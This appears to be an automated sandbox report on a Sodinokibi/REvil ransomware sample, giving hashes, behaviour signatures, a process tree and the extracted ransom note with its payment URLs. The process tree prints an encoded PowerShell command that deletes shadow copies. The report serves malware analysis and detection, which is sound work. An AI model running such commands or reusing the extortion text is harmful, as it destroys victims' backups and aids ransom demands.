Analysis

  • max time kernel
    143s
  • max time network
    86s
  • platform
    windows7_x64
  • resource
    win7v200722
  • submitted
    29-07-2020 14:06

General

  • Target

    d064cc1d0d70ce88dce14f6d33689c5f2622026ae3f6601fa7f0724a36624016.bin.exe

  • Size

    116KB

  • MD5

    3f5b1cc5a66314eb6074c0f72bbd07ab

  • SHA1

    c26640133adc2d465855248043b971c0f7c77843

  • SHA256

    d064cc1d0d70ce88dce14f6d33689c5f2622026ae3f6601fa7f0724a36624016

  • SHA512

    e1a5f7e452bde40d84aa757fd60a4bb4ca3efffac36e19bba56f97143b2666538d7873249b6f54706905f5de1036e76d2a48917acc92e719e9ebc13808e40fab

Malware Config

Extracted

Path

C:\304ll-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome NinaShoes. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 304ll. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/7110839F576A78BB 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/7110839F576A78BB Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: uaQFvH52paUODT+alra1qpriWXRP+BJLSkvuGNB0AwuII3nkiPgRFlv0jzq/K8h3 pKOdgzV3dy8gDUxy9pshVZYsc704RbxEDHNuiqubbPh5CHiOtlYpKv2RrVJg1Hzd 219F8OC9LUablWOe9DNkw56JuKdbDY81ZIgqMqAaNr5LqFx427jOdQdiIdF+SiZm 3rIAyZp9gB5Kbb5DEmfhrNGMPo9VMByh2ZpsxSPiiNmjeTKRryVD8n20YAnUSjRz krPw5HbGLOr5/LI5WKWwyJz+hL00Z3wNnqsW4nHjlN5vP1aBLISPGPZoWF8oMRxz H7ZobvEQNZ+EFk5gocPB1snv2QPoSP+x9i6oa4Vh3smqfAruFG4deVA71VB+XrHw 7LF2HJ7LVIuDBF7ykeq4wKZ4t7lB4EfI0/HUq8TzeI++dQDclmmy01ZZkDiX0BBr sdmiMzFR8qMTegZku6nV59Rh1pRF6pBrOm5PVDqKVf7UXtcgS9AnwAbezqsHHiRl KF73Z9hJnYiwwx6E+hSA0+LgJGd8oenWxTCnbplGLLEmwcEhZrRs1Jvj3F9rnIeT rMH3fPH+kml6NLrEApCh1uMpbGCqV5N6R+V025VpO6u8Q/6Jr9GBRJyioKTarE+h 3f1+NMpYBZmuK+wlhhqpbOpodqb8W2z9Hh9BpEQ00xhbH3ZdCeDZN3ZzWzaXK4ud bgrUCm+z1FjDpiS/CdJjVxScRPwngW3hLFvlZXkwZ5EyMGKWu28+FJ40Z6lWG2p/ pGYv0sXN/W2aN8ebgvV6uDwL5bCaJ+PyR++KS7b/AArvFCgU6RC/VHRtaJwDN03w yy1ddotxewIenpUkh9SqaMc0diC63sis5YaaiJiI7gPaIZKNkyC8SJ9iK52SrDyF xyWYRgnohZ4V5VV7PLHoWSffctMUlfDFE8EZf0yrAAzdfMvOfy3N7pxSfpEJ6pIT 9Jo8oN5LHV/801MfQceWYQMdukFhxLCeLxG/IqlgkAlQmNCJmWdBREk6ELO5Yhz9 12kHIxjEC0tmF21wvDyPB3Zk1IpZ9tRC16wgIjWHObJWYeD1Al4Tbob3hWHPaISf 8/h/ZaEI37O9hNiCdUNPB1pJeS2RUxfmZwLS6eiErkrSWT7lQjgEWq8qc3un0ryR gn+toalDWkeVfjwMZE7c7xslUeDQTNiPeOikhYPkvP9RfXEPDY4gNp23mO6NBYfv K9GfFLIcfUGciR05RgRq44NUDGZ90KpYKmzy2IIDpy+w1oETUIxadvcCZaFcMGz/ gwujYHzkvMMrJm9lsmTXXVEGSu+yGjaQFcL0Ui3a ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/7110839F576A78BB

http://decryptor.cc/7110839F576A78BB

Signatures

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Modifies service 2 TTPs 5 IoCs
  • Modifies extensions of user files 12 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs
  • Drops file in Program Files directory 13 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d064cc1d0d70ce88dce14f6d33689c5f2622026ae3f6601fa7f0724a36624016.bin.exe
    "C:\Users\Admin\AppData\Local\Temp\d064cc1d0d70ce88dce14f6d33689c5f2622026ae3f6601fa7f0724a36624016.bin.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    • Modifies extensions of user files
    • Suspicious use of AdjustPrivilegeToken
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    PID:1680
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:732
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:1744
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Modifies service
      • Suspicious use of AdjustPrivilegeToken
      PID:1968

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/732-0-0x0000000000000000-mapping.dmp